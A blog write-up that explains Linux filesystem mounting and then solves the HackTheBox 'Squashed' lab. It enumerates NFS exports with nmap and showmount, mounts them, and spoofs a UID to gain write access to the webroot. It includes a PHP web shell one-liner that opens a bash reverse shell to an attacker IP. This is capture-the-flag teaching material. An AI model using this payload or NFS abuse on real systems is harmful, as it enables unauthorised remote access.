MOUNT A FILE SYSTEM IN LINUX | DEMO: SQUASHED HTB EASY BOX
What does it mean to mount a file system in linux? A better way to describe “mount” is “attach” . The filesystem being mounted is attached to an empty directory of the existing filesystem. That is, the top level directory of the mounted filesystem becomes the directory on the existing filesystem. Sub directories of the mounted filesystem become the subdirectories of the former directory on the existing filesystem, and so on. (The directory that was mounted on doesn’t really have to be empty, but after mounting any contents it had are inaccessible, until the filesystem is unmounted).
Unlike on Windows where different file systems have different drive letters like C: and D:, Unix-like filesystems have a single root at /. So when you attach a new disk drive or USB stick to a Linux system, the new filesystem has to exist somewhere in the existing filesystem. In other words, some existing directory must serve as the root of the new filesystem. These directories are known as mount points.For removable drives, the mount points are usually located under /media, but they can be located anywhere
Mounting a filesystem simply means making the particular filesystem accessible at a certain point in the Linux directory tree. When mounting a filesystem it does not matter if the filesystem is a hard disk partition, CD-ROM, floppy, or USB storage device . You can mount a file system with mount command. Normally /mnt folder is used for mounting.
Example sudo mount /dev/sda3 /mntFor demo purposes I am going to use a vulnerable box from HacktheBox platform called Squashed.
Gaining FootHold
we are provided with an IP address , we can use nmap to scan for services and open ports on the machine. We get the following results :
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 45669/tcp6 mountd
| 100005 1,2,3 50287/udp6 mountd
| 100005 1,2,3 53317/tcp mountd
| 100005 1,2,3 54473/udp mountd
| 100021 1,3,4 33785/tcp6 nlockmgr
| 100021 1,3,4 34763/tcp nlockmgr
| 100021 1,3,4 39022/udp nlockmgr
| 100021 1,3,4 50677/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
34385/tcp open mountd 1-3 (RPC #100005)
34763/tcp open nlockmgr 1-4 (RPC #100021)
50976/tcp filtered unknown
53317/tcp open mountd 1-3 (RPC #100005)
54765/tcp open mountd 1-3 (RPC #100005)From the ttl we can tell its a linux box and it has a nfs service on port 2049! Can we try a more detailed scan specifically for that port :) Yes we can !sudo nmap 10.10.11.191 --script nfs-ls we get the following results :
➜ Squashed sudo nmap 10.10.11.191 --script nfs-ls
[sudo] password for trustie:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-26 19:34 EAT
Nmap scan report for 10.10.11.191
Host is up (1.4s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
| nfs-ls: Volume /home/ross
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 1001 1001 4096 2022-11-25T05:48:36 .
| ?????????? ? ? ? ? ..
| rwx------ 1001 1001 4096 2022-10-21T14:57:01 .cache
| rwx------ 1001 1001 4096 2022-10-21T14:57:01 .config
| rwx------ 1001 1001 4096 2022-10-21T14:57:01 .local
| rw------- 1001 1001 2475 2022-10-31T10:13:23 .xsession-errors.old
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Documents
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Music
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Pictures
| rwxr-xr-x 1001 1001 4096 2022-10-21T14:57:01 Public
|
|
| Volume /var/www/html
| access: Read NoLookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-- 2017 33 4096 2022-11-26T16:30:01 .
| ?????????? ? ? ? ? ..
| ?????????? ? ? ? ? .htaccess
| ?????????? ? ? ? ? css
| ?????????? ? ? ? ? images
| ?????????? ? ? ? ? index.html
| ?????????? ? ? ? ? js
|_
2049/tcp open nfsFrom the nmap results we see all mounted folders, we can also use this command :showmount -e 10.10.11.191
➜ nmap showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *We get that we have/home/ross and /var/www/html.The next thing we can try to do is mount the files to our own machine file system using the following commands:
➜ nmap sudo mkdir /mnt/ross_folder && sudo mkdir /mnt/web_folder
➜ nmap cd /mnt
➜ /mnt sudo mount -t nfs 10.10.11.191:/var/www/html /mnt/web_folder -o nolock
➜ /mnt sudo mount -t nfs 10.10.11.191:/home/ross /mnt/ross_folder -o nolock
➜ /mnt ls web_folder
ls: cannot access 'web_folder/index.html': Permission denied
ls: cannot access 'web_folder/images': Permission denied
ls: cannot access 'web_folder/css': Permission denied
ls: cannot access 'web_folder/js': Permission denied
css images index.html jsFrom the above results we can see that we are unable to access the folder files due to permissions. Using the nmap results we saw the user had a uid of 2017, we can create an example user and give him this uid , then try to access the mounted files .sudo useradd haha
sudo usermod -u 2017 haha
sudo groupmod -g 2017 haha
Now we can switch to this user haha and access the mounted files
➜ /mnt su haha
$ ls
kenobiNFS ross_folder web_folder
$ cd web_folder
$ ls
css images index.html js
$ ls -al
total 56
drwxr-xr-- 5 haha www-data 4096 Nov 26 19:15 .
drwxr-xr-x 5 root root 4096 Nov 26 18:57 ..
drwxr-xr-x 2 haha www-data 4096 Nov 26 19:15 css
-rw-r--r-- 1 haha www-data 44 Oct 21 13:30 .htaccess
drwxr-xr-x 2 haha www-data 4096 Nov 26 19:15 images
-rw-r----- 1 haha www-data 32532 Nov 26 19:15 index.html
drwxr-xr-x 2 haha www-data 4096 Nov 26 19:15 js
$ cat .htaccess
AddType application/x-httpd-php .htm .htmlWe can note that this files are in the webroot therefore we can create a malicious php file in images directory with the following content that will send a reverse shell back to us once we execute it. On the web we can navigate to images endpoint and click on the php file to execute it!
<?php system("bash -c 'bash -i &>/dev/tcp/10.10.*.48/1337 <&1'");?>we get a reverse shell as user alex . User flag can be found on /home/alex . We can continue escalating our privileges to root and getting the root flag though that is not important with regards to this article, therefore you can skip this part , scroll down and clap for me if the article was useful!
Privilege Escalation
Moving forward we can note that there is another user ross On her directory we find the following:
A Xauthority file is a file used by the X Window System to control access to a user’s X server. The file contains a list of hostnames and X server display numbers that the user is allowed to connect to.The file is typically stored in the user’s home directory and is named .Xauthority. If the file does not exist, it will be created when the user first tries to connect to an X server. The Passwords.kdbx file is a keepass database , you can try to crack it with john the ripper but in my case i had no success with that .Basically since this file stores the user session we can change our session to be ross since she is also logged in . To do that we create a fake use with the id of ross and transfer the xauthority* file to our ssh session .You can use python http server…
Oops to this point i cant complete the box either :/
To finish the box , find the instructions here the HackTricks page
Anyway to delete the user and unmount the directory , use this commands:
➜ /mnt sudo userdel haha
➜ /mnt sudo umount directory_nameWriteups for the box are Tahafarooq and Oxdf
Clap and follow me for more :)
